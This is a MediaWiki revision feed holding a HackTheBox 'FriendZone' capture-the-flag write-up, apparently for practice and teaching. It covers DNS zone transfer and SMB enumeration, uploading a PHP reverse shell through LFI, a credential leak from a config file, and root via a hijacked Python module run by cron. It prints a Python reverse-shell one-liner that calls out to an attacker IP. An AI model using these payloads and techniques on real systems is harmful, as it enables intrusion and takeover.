<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FFriendZone</id>
	<title>Write-ups/HTB/FriendZone - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://book.ghanim.no/index.php?action=history&amp;feed=atom&amp;title=Write-ups%2FHTB%2FFriendZone"/>
	<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/FriendZone&amp;action=history"/>
	<updated>2026-04-21T14:48:57Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://book.ghanim.no/index.php?title=Write-ups/HTB/FriendZone&amp;diff=1199&amp;oldid=prev</id>
		<title>imported&gt;Aghanim at 11:56, 5 April 2022</title>
		<link rel="alternate" type="text/html" href="https://book.ghanim.no/index.php?title=Write-ups/HTB/FriendZone&amp;diff=1199&amp;oldid=prev"/>
		<updated>2022-04-05T11:56:42Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;{{Infobox WriteUp&lt;br /&gt;
| name = FriendZone&lt;br /&gt;
| platform = HackTheBox&lt;br /&gt;
| os = Linux&lt;br /&gt;
| difficulty = Easy&lt;br /&gt;
| techniques = LFI, SMB, Python Library Hijack&lt;br /&gt;
}}&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-FriendZone.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This Linux machine had a PHP page with LFI vulnerability. To upload a webshell I used SMB. From there we find credentials from a database config file. To root the machine I added a reverse shell to a writeable python module which was called upon by a python script run by root in cronjob.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Enumeration ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# cat nmap.ver&lt;br /&gt;
# Nmap 7.92 scan initiated Wed Feb  9 09:04:20 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.ver 10.10.10.123&lt;br /&gt;
Nmap scan report for 10.10.10.123&lt;br /&gt;
Host is up (0.042s latency).&lt;br /&gt;
Not shown: 65528 closed tcp ports (reset)&lt;br /&gt;
PORT    STATE SERVICE     VERSION&lt;br /&gt;
21/tcp  open  ftp         vsftpd 3.0.3&lt;br /&gt;
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)&lt;br /&gt;
| ssh-hostkey:&lt;br /&gt;
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)&lt;br /&gt;
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)&lt;br /&gt;
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)&lt;br /&gt;
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)&lt;br /&gt;
| dns-nsid:&lt;br /&gt;
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu&lt;br /&gt;
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))&lt;br /&gt;
|_http-title: Friend Zone Escape software&lt;br /&gt;
|_http-server-header: Apache/2.4.29 (Ubuntu)&lt;br /&gt;
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)&lt;br /&gt;
443/tcp open  ssl/http    Apache httpd 2.4.29&lt;br /&gt;
|_ssl-date: TLS randomness does not represent time&lt;br /&gt;
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO&lt;br /&gt;
| Not valid before: 2018-10-05T21:02:30&lt;br /&gt;
|_Not valid after:  2018-11-04T21:02:30&lt;br /&gt;
|_http-server-header: Apache/2.4.29 (Ubuntu)&lt;br /&gt;
| tls-alpn:&lt;br /&gt;
|_  http/1.1&lt;br /&gt;
|_http-title: 404 Not Found&lt;br /&gt;
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)&lt;br /&gt;
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel&lt;br /&gt;
&lt;br /&gt;
Host script results:&lt;br /&gt;
|_clock-skew: mean: -38m03s, deviation: 1h09m16s, median: 1m56s&lt;br /&gt;
| smb-os-discovery:&lt;br /&gt;
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)&lt;br /&gt;
|   Computer name: friendzone&lt;br /&gt;
|   NetBIOS computer name: FRIENDZONE\x00&lt;br /&gt;
|   Domain name: \x00&lt;br /&gt;
|   FQDN: friendzone&lt;br /&gt;
|_  System time: 2022-02-09T16:06:37+02:00&lt;br /&gt;
| smb2-security-mode:&lt;br /&gt;
|   3.1.1:&lt;br /&gt;
|_    Message signing enabled but not required&lt;br /&gt;
| smb2-time:&lt;br /&gt;
|   date: 2022-02-09T14:06:37&lt;br /&gt;
|_  start_date: N/A&lt;br /&gt;
| smb-security-mode:&lt;br /&gt;
|   account_used: guest&lt;br /&gt;
|   authentication_level: user&lt;br /&gt;
|   challenge_response: supported&lt;br /&gt;
|_  message_signing: disabled (dangerous, but default)&lt;br /&gt;
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: , NetBIOS MAC:  (unknown)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Add &amp;#039;&amp;#039;&amp;#039;friendzone.red &amp;#039;&amp;#039;&amp;#039;to /etc/hosts file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Zone transfer ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&lt;br /&gt;
DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction. It is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers. &lt;br /&gt;
[https://en.wikipedia.org/wiki/DNS_zone_transfer Wikipedia]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# dig axfr @10.10.10.123 friendzone.red&lt;br /&gt;
&lt;br /&gt;
; &amp;gt; DiG 9.17.21-1-Debian &amp;gt; axfr @10.10.10.123 friendzone.red&lt;br /&gt;
; (1 server found)&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800&lt;br /&gt;
friendzone.red.         604800  IN      AAAA    ::1&lt;br /&gt;
friendzone.red.         604800  IN      NS      localhost.&lt;br /&gt;
friendzone.red.         604800  IN      A       127.0.0.1&lt;br /&gt;
administrator1.friendzone.red. 604800 IN A      127.0.0.1&lt;br /&gt;
hr.friendzone.red.      604800  IN      A       127.0.0.1&lt;br /&gt;
uploads.friendzone.red. 604800  IN      A       127.0.0.1&lt;br /&gt;
friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800&lt;br /&gt;
;; Query time: 72 msec&lt;br /&gt;
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)&lt;br /&gt;
;; WHEN: Wed Feb 09 09:16:58 EST 2022&lt;br /&gt;
;; XFR size: 8 records (messages 1, bytes 289)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We now add the new subdomains to /etc/hosts file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sub-dir bruteforce - Feroxbuster ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# gobuster dir -u https://administrator1.friendzone.red -x php,jpg -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k      1 ⨯&lt;br /&gt;
===============================================================&lt;br /&gt;
Gobuster v3.1.0&lt;br /&gt;
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)&lt;br /&gt;
===============================================================&lt;br /&gt;
[+] Url:                     https://administrator1.friendzone.red&lt;br /&gt;
[+] Method:                  GET&lt;br /&gt;
[+] Threads:                 10&lt;br /&gt;
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt&lt;br /&gt;
[+] Negative Status codes:   404&lt;br /&gt;
[+] User Agent:              gobuster/3.1.0&lt;br /&gt;
[+] Extensions:              php,jpg&lt;br /&gt;
[+] Timeout:                 10s&lt;br /&gt;
===============================================================&lt;br /&gt;
2022/02/09 13:47:13 Starting gobuster in directory enumeration mode&lt;br /&gt;
===============================================================&lt;br /&gt;
/images               (Status: 301) [Size: 349] [--&amp;gt; https://administrator1.friendzone.red/images/]&lt;br /&gt;
/login.php            (Status: 200) [Size: 7]&lt;br /&gt;
/dashboard.php        (Status: 200) [Size: 101]&lt;br /&gt;
/timestamp.php        (Status: 200) [Size: 36]&lt;br /&gt;
/server-status        (Status: 403) [Size: 318]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Looking at the webpages ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We find one interesting webpage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220209200044.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220209200118.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== SMB enumeration ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Looking at the path for each share we can see that for example \Development is pointing to C:\etc\Development.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# nmap -p 445 -Pn friendzone.red --script smb-enum-shares 10.10.10.123&lt;br /&gt;
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 05:31 EST&lt;br /&gt;
Nmap scan report for friendzone.red (10.10.10.123)&lt;br /&gt;
Host is up (0.13s latency).&lt;br /&gt;
&lt;br /&gt;
PORT    STATE SERVICE&lt;br /&gt;
445/tcp open  microsoft-ds&lt;br /&gt;
&lt;br /&gt;
Host script results:&lt;br /&gt;
| smb-enum-shares:&lt;br /&gt;
|   account_used: guest&lt;br /&gt;
|   \\10.10.10.123\Development:&lt;br /&gt;
|     Type: STYPE_DISKTREE&lt;br /&gt;
|     Comment: FriendZone Samba Server Files&lt;br /&gt;
|     Users: 0&lt;br /&gt;
|     Max Users:&lt;br /&gt;
|     Path: C:\etc\Development&lt;br /&gt;
|     Anonymous access: READ/WRITE&lt;br /&gt;
|     Current user access: READ/WRITE&lt;br /&gt;
|   \\10.10.10.123\Files:&lt;br /&gt;
|     Type: STYPE_DISKTREE&lt;br /&gt;
|     Comment: FriendZone Samba Server Files /etc/Files&lt;br /&gt;
|     Users: 0&lt;br /&gt;
|     Max Users:&lt;br /&gt;
|     Path: C:\etc\hole&lt;br /&gt;
|     Anonymous access:&lt;br /&gt;
|     Current user access:&lt;br /&gt;
|   \\10.10.10.123\IPC$:&lt;br /&gt;
|     Type: STYPE_IPC_HIDDEN&lt;br /&gt;
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))&lt;br /&gt;
|     Users: 1&lt;br /&gt;
|     Max Users:&lt;br /&gt;
|     Path: C:\tmp&lt;br /&gt;
|     Anonymous access: READ/WRITE&lt;br /&gt;
|     Current user access: READ/WRITE&lt;br /&gt;
|   \\10.10.10.123\general:&lt;br /&gt;
|     Type: STYPE_DISKTREE&lt;br /&gt;
|     Comment: FriendZone Samba Server Files&lt;br /&gt;
|     Users: 0&lt;br /&gt;
|     Max Users:&lt;br /&gt;
|     Path: C:\etc\general&lt;br /&gt;
|     Anonymous access: READ/WRITE&lt;br /&gt;
|     Current user access: READ/WRITE&lt;br /&gt;
|   \\10.10.10.123\print$:&lt;br /&gt;
|     Type: STYPE_DISKTREE&lt;br /&gt;
|     Comment: Printer Drivers&lt;br /&gt;
|     Users: 0&lt;br /&gt;
|     Max Users:&lt;br /&gt;
|     Path: C:\var\lib\samba\printers&lt;br /&gt;
|     Anonymous access:&lt;br /&gt;
|_    Current user access:&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Initial Access - Shell as www-data ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Test LFI ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# cat hello.php&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upload the php file to SMB.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# smbclient //10.10.10.123/Development&lt;br /&gt;
Enter WORKGROUP\root&amp;#039;s password:&lt;br /&gt;
Try &amp;quot;help&amp;quot; to get a list of possible commands.&lt;br /&gt;
smb: \&amp;gt; put hello.php&lt;br /&gt;
putting file hello.php as \hello.php (0.3 kb/s) (average 0.3 kb/s)&lt;br /&gt;
smb: \&amp;gt; ls&lt;br /&gt;
  .                                   D        0  Wed Feb  9 15:02:15 2022&lt;br /&gt;
  ..                                  D        0  Wed Jan 23 16:51:02 2019&lt;br /&gt;
  hello.php                           A       33  Wed Feb  9 15:03:47 2022&lt;br /&gt;
&lt;br /&gt;
                9221460 blocks of size 1024. 6326080 blocks available&lt;br /&gt;
smb: \&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We know that Development is in &amp;#039;&amp;#039;&amp;#039;/etc&amp;#039;&amp;#039;&amp;#039;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220209210107.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Reverse shell ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We upload a php reverse shell to SMB.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
smb: \&amp;gt; put php-reverse-shell.php&lt;br /&gt;
putting file php-reverse-shell.php as \php-reverse-shell.php (51.6 kb/s) (average 51.6 kb/s)&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We curling or visiting this URL we will get a reverse shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&amp;amp;pagename=/etc/Development/php-reverse-shell&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/friendzone]&lt;br /&gt;
└─# nc -lvnp  4444&lt;br /&gt;
listening on [any] 4444 ...&lt;br /&gt;
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.123] 58218&lt;br /&gt;
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux&lt;br /&gt;
 22:49:28 up  6:43,  0 users,  load average: 0.00, 0.27, 0.39&lt;br /&gt;
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT&lt;br /&gt;
uid=33(www-data) gid=33(www-data) groups=33(www-data)&lt;br /&gt;
/bin/sh: 0: can&amp;#039;t access tty; job control turned off&lt;br /&gt;
$ whoami&lt;br /&gt;
www-data&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Shell as Friend ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In /var/www there is a mysql config file which have the credentials for the user friend. We can now su to friend.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
www-data@FriendZone:/var/www$ cat mysql_data.conf&lt;br /&gt;
for development process this is the mysql creds for user friend&lt;br /&gt;
&lt;br /&gt;
db_user=friend&lt;br /&gt;
&lt;br /&gt;
db_pass=Agpyu12!0.213$&lt;br /&gt;
&lt;br /&gt;
db_name=FZ&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Root ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Enumeration ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In /opt/ there is a script caleld &amp;#039;&amp;#039;&amp;#039;reporter.py&amp;#039;&amp;#039;&amp;#039;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This script looks like its trying to send an email from admin2 to admin1. But the script is not finished yet as we can see from the comment below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
friend@FriendZone:/opt/server_admin$ cat reporter.py&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
import os&lt;br /&gt;
&lt;br /&gt;
to_address = &amp;quot;admin1@friendzone.com&amp;quot;&lt;br /&gt;
from_address = &amp;quot;admin2@friendzone.com&amp;quot;&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;[+] Trying to send email to %s&amp;quot;%to_address&lt;br /&gt;
&lt;br /&gt;
#command = &amp;#039;&amp;#039;&amp;#039; mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass &amp;quot;PAPAP&amp;quot;&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&lt;br /&gt;
#os.system(command)&lt;br /&gt;
&lt;br /&gt;
# I need to edit the script later&lt;br /&gt;
# Sam ~ python developer&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== pspy ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;gt;&lt;br /&gt;
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.&lt;br /&gt;
https://github.com/DominicBreuker/pspy&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uploading pspy to the target machine and running it we can see from the output that the script &amp;#039;&amp;#039;&amp;#039;reporter.py &amp;#039;&amp;#039;&amp;#039;is running every two minutes.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
friend@FriendZone:/tmp$ ./pspy64&lt;br /&gt;
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
     ██▓███    ██████  ██▓███ ▓██   ██▓&lt;br /&gt;
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒&lt;br /&gt;
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░&lt;br /&gt;
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░&lt;br /&gt;
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░&lt;br /&gt;
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒&lt;br /&gt;
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░&lt;br /&gt;
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░&lt;br /&gt;
                   ░           ░ ░&lt;br /&gt;
                               ░ ░&lt;br /&gt;
&lt;br /&gt;
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)&lt;br /&gt;
Draining file system events due to startup...&lt;br /&gt;
done&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220210114034.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Command injection ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
os.py is writeable so we can inject a reverse shell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220210114422.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We use a python reverse shell from PayloadAllthethings.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;python&amp;quot;&amp;gt;&lt;br /&gt;
python -c &amp;#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;quot;10.0.0.1&amp;quot;,4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&amp;quot;/bin/sh&amp;quot;)&amp;#039;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:2022-04-Pasted-image-20220210121434.png|thumb]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Shell as root ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now I&amp;#039;ll wait two minutes for the cronjob to run and I&amp;#039;ll have a connection on my listener.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
┌──(root💀kali)-[/home/aghanim]&lt;br /&gt;
└─# nc -lvnp  5555&lt;br /&gt;
listening on [any] 5555 ...&lt;br /&gt;
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.123] 47128&lt;br /&gt;
# whoami&lt;br /&gt;
whoami&lt;br /&gt;
root&lt;br /&gt;
#&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:HackTheBox]]&lt;br /&gt;
[[Category:Linux]]&lt;br /&gt;
[[Category:Write-ups]]&lt;/div&gt;</summary>
		<author><name>imported&gt;Aghanim</name></author>
	</entry>
</feed>